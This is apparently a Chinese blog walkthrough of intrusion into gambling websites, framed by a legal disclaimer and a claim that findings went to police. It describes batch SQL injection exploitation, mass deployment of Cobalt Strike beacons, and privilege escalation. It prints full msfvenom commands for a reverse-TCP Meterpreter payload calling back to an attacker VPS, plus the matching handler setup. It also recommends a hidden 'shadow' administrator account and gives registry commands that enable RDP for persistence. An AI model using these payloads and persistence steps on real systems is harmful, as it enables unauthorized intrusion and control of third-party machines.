一次对BC网站的渗透测试实战

更多文章见我的个人主页

法律声明

《关于办理赌博刑事案件具体应用法律若干问题的解释》主文中关于开设赌场罪的内容[最高人民法院,最高人民检察院] [法释〔2005〕3号] [2005.05.11 发布] [2005.05.13 实施]：
以营利为目的，在计算机网络上建立赌博网站，或者为赌博网站担任代理，接受投注的，属于刑法第三百零三条规定的“开设赌场”。
中华人民共和国公民在我国领域外周边地区聚众赌博、开设赌场，以吸引中华人民共和国公民为主要客源，构成赌博罪的，可以依照刑法规定追究刑事责任。

此渗透测试后已将所有信息移交警方，请勿用于非法用途。

渗透过程

信息搜集

首先当然是通过fofa进行bc网站的后台搜集（搜索语法大家自行探索），获得的棋牌bc站几乎都是一模一样，估计是分站。随便打开一个看看，是下图

sqlmap跑一把，发现存在堆叠注入。由于都是分站，因此存在相同漏洞的应该不少。

上线cs

写个脚本，批量上线cs。可以看到有个上线就直接是SYSTEM权限，这就很无聊了。我们拿个普通权限的进行进一步渗透测试

首先我们要提权，至少也得有Administrator权限吧。

提权

方式一（漏洞利用）

cs中执行run systeminfo收集目标安装的补丁，使用在线提权辅助工具查看能够利用的漏洞。查找exp并利用即可。

方式二（msf辅助提权）

要想利用msf辅助提权，必须要反弹shell到msf

一方面可以利用cs在目标机上执行msf生成的木马上线msf。我这里是cs服务端和msf在同一vps上

msfvenom -p windows/meterpreter_reverse_tcp lhost=x.x.x.x lport=8888 -f exe > shell.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter_reverse_tcp
show options
set lhost x.x.x.x
set lport 8888
run
1
2
3
4
5
6
7
8

将shell.exe上传至目标并执行，即可看到msf已上线

或者直接通过cs进行会话派生spawn

cs上创建监听器

msf进行配置，注意这里两个payload要相互对应

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost x.x.x.x
set lport 8888
exploit
1
2
3
4
5

在msf中getuid查看到当前用户为mssqlsserver，利用msf自带的提权getsystem，居然直接就提权成功，拿到了system权限。

然后再利用system权限执行cs生成的shell，上线之后就是system权限了

当然我们获得system权限后可以注入进程，更安全一些

现在既然已经拿到了最高权限，那就可以为所欲为了。

后渗透

强烈建议创建一个影子管理员用户，请自行百度。

开启RDP

nmap扫一下发现3389端口未开

查看是否开启rdp
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

如未打开，使用下列命令打开
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

查看rdp端口
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
1
2
3
4
5
6
7
8